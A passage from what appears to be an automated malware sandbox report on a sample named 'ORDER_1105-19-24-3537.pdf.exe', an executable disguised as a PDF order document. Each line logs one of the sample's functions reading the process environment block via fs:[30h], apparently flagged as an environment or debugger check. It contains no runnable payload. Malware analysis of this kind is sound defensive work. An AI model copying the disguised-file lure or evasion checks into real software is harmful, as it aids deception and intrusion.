          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E437C mov eax, dword ptr fs:[00000030h]4_2_011E437C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120A352 mov eax, dword ptr fs:[00000030h]4_2_0120A352
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01138397 mov eax, dword ptr fs:[00000030h]4_2_01138397
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01138397 mov eax, dword ptr fs:[00000030h]4_2_01138397
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01138397 mov eax, dword ptr fs:[00000030h]4_2_01138397
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116438F mov eax, dword ptr fs:[00000030h]4_2_0116438F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116438F mov eax, dword ptr fs:[00000030h]4_2_0116438F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113E388 mov eax, dword ptr fs:[00000030h]4_2_0113E388
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113E388 mov eax, dword ptr fs:[00000030h]4_2_0113E388
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113E388 mov eax, dword ptr fs:[00000030h]4_2_0113E388
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE3DB mov eax, dword ptr fs:[00000030h]4_2_011EE3DB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE3DB mov eax, dword ptr fs:[00000030h]4_2_011EE3DB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE3DB mov ecx, dword ptr fs:[00000030h]4_2_011EE3DB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE3DB mov eax, dword ptr fs:[00000030h]4_2_011EE3DB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E43D4 mov eax, dword ptr fs:[00000030h]4_2_011E43D4
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E43D4 mov eax, dword ptr fs:[00000030h]4_2_011E43D4
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FC3CD mov eax, dword ptr fs:[00000030h]4_2_011FC3CD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]4_2_0114A3C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]4_2_0114A3C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]4_2_0114A3C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]4_2_0114A3C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]4_2_0114A3C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]4_2_0114A3C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]4_2_011483C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]4_2_011483C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]4_2_011483C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]4_2_011483C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C63C0 mov eax, dword ptr fs:[00000030h]4_2_011C63C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E3F0 mov eax, dword ptr fs:[00000030h]4_2_0115E3F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E3F0 mov eax, dword ptr fs:[00000030h]4_2_0115E3F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E3F0 mov eax, dword ptr fs:[00000030h]4_2_0115E3F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011763FF mov eax, dword ptr fs:[00000030h]4_2_011763FF
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]4_2_011503E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113823B mov eax, dword ptr fs:[00000030h]4_2_0113823B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113A250 mov eax, dword ptr fs:[00000030h]4_2_0113A250
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146259 mov eax, dword ptr fs:[00000030h]4_2_01146259
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FA250 mov eax, dword ptr fs:[00000030h]4_2_011FA250
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FA250 mov eax, dword ptr fs:[00000030h]4_2_011FA250
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C8243 mov eax, dword ptr fs:[00000030h]4_2_011C8243
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C8243 mov ecx, dword ptr fs:[00000030h]4_2_011C8243
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]4_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144260 mov eax, dword ptr fs:[00000030h]4_2_01144260
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144260 mov eax, dword ptr fs:[00000030h]4_2_01144260
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01144260 mov eax, dword ptr fs:[00000030h]4_2_01144260
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113826B mov eax, dword ptr fs:[00000030h]4_2_0113826B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E284 mov eax, dword ptr fs:[00000030h]4_2_0117E284
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E284 mov eax, dword ptr fs:[00000030h]4_2_0117E284
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C0283 mov eax, dword ptr fs:[00000030h]4_2_011C0283
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C0283 mov eax, dword ptr fs:[00000030h]4_2_011C0283
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C0283 mov eax, dword ptr fs:[00000030h]4_2_011C0283
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011502A0 mov eax, dword ptr fs:[00000030h]4_2_011502A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011502A0 mov eax, dword ptr fs:[00000030h]4_2_011502A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]4_2_011D62A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D62A0 mov ecx, dword ptr fs:[00000030h]4_2_011D62A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]4_2_011D62A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]4_2_011D62A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]4_2_011D62A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]4_2_011D62A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]4_2_0114A2C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]4_2_0114A2C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]4_2_0114A2C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]4_2_0114A2C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]4_2_0114A2C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011502E1 mov eax, dword ptr fs:[00000030h]4_2_011502E1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011502E1 mov eax, dword ptr fs:[00000030h]4_2_011502E1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011502E1 mov eax, dword ptr fs:[00000030h]4_2_011502E1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D6500 mov eax, dword ptr fs:[00000030h]4_2_011D6500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]4_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]4_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]4_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]4_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]4_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]4_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]4_2_01214500
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]4_2_0116E53E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]4_2_0116E53E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]4_2_0116E53E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]4_2_0116E53E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]4_2_0116E53E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148550 mov eax, dword ptr fs:[00000030h]4_2_01148550
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148550 mov eax, dword ptr fs:[00000030h]4_2_01148550
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117656A mov eax, dword ptr fs:[00000030h]4_2_0117656A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117656A mov eax, dword ptr fs:[00000030h]4_2_0117656A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117656A mov eax, dword ptr fs:[00000030h]4_2_0117656A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E59C mov eax, dword ptr fs:[00000030h]4_2_0117E59C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01142582 mov eax, dword ptr fs:[00000030h]4_2_01142582
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01142582 mov ecx, dword ptr fs:[00000030h]4_2_01142582
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01174588 mov eax, dword ptr fs:[00000030h]4_2_01174588
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011645B1 mov eax, dword ptr fs:[00000030h]4_2_011645B1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011645B1 mov eax, dword ptr fs:[00000030h]4_2_011645B1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C05A7 mov eax, dword ptr fs:[00000030h]4_2_011C05A7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C05A7 mov eax, dword ptr fs:[00000030h]4_2_011C05A7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C05A7 mov eax, dword ptr fs:[00000030h]4_2_011C05A7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011465D0 mov eax, dword ptr fs:[00000030h]4_2_011465D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A5D0 mov eax, dword ptr fs:[00000030h]4_2_0117A5D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A5D0 mov eax, dword ptr fs:[00000030h]4_2_0117A5D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E5CF mov eax, dword ptr fs:[00000030h]4_2_0117E5CF
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E5CF mov eax, dword ptr fs:[00000030h]4_2_0117E5CF
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]4_2_0116E5E7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011425E0 mov eax, dword ptr fs:[00000030h]4_2_011425E0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C5ED mov eax, dword ptr fs:[00000030h]4_2_0117C5ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C5ED mov eax, dword ptr fs:[00000030h]4_2_0117C5ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01178402 mov eax, dword ptr fs:[00000030h]4_2_01178402
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01178402 mov eax, dword ptr fs:[00000030h]4_2_01178402
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01178402 mov eax, dword ptr fs:[00000030h]4_2_01178402
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A430 mov eax, dword ptr fs:[00000030h]4_2_0117A430
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113E420 mov eax, dword ptr fs:[00000030h]4_2_0113E420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113E420 mov eax, dword ptr fs:[00000030h]4_2_0113E420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113E420 mov eax, dword ptr fs:[00000030h]4_2_0113E420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113C427 mov eax, dword ptr fs:[00000030h]4_2_0113C427
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]4_2_011C6420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FA456 mov eax, dword ptr fs:[00000030h]4_2_011FA456
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116245A mov eax, dword ptr fs:[00000030h]4_2_0116245A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113645D mov eax, dword ptr fs:[00000030h]4_2_0113645D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]4_2_0117E443
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116A470 mov eax, dword ptr fs:[00000030h]4_2_0116A470
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116A470 mov eax, dword ptr fs:[00000030h]4_2_0116A470
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116A470 mov eax, dword ptr fs:[00000030h]4_2_0116A470
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CC460 mov ecx, dword ptr fs:[00000030h]4_2_011CC460
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FA49A mov eax, dword ptr fs:[00000030h]4_2_011FA49A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011744B0 mov ecx, dword ptr fs:[00000030h]4_2_011744B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CA4B0 mov eax, dword ptr fs:[00000030h]4_2_011CA4B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011464AB mov eax, dword ptr fs:[00000030h]4_2_011464AB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011404E5 mov ecx, dword ptr fs:[00000030h]4_2_011404E5
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140710 mov eax, dword ptr fs:[00000030h]4_2_01140710
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01170710 mov eax, dword ptr fs:[00000030h]4_2_01170710
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C700 mov eax, dword ptr fs:[00000030h]4_2_0117C700
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117273C mov eax, dword ptr fs:[00000030h]4_2_0117273C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117273C mov ecx, dword ptr fs:[00000030h]4_2_0117273C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117273C mov eax, dword ptr fs:[00000030h]4_2_0117273C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BC730 mov eax, dword ptr fs:[00000030h]4_2_011BC730
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C720 mov eax, dword ptr fs:[00000030h]4_2_0117C720
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117C720 mov eax, dword ptr fs:[00000030h]4_2_0117C720
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CE75D mov eax, dword ptr fs:[00000030h]4_2_011CE75D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140750 mov eax, dword ptr fs:[00000030h]4_2_01140750
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182750 mov eax, dword ptr fs:[00000030h]4_2_01182750
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182750 mov eax, dword ptr fs:[00000030h]4_2_01182750
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C4755 mov eax, dword ptr fs:[00000030h]4_2_011C4755
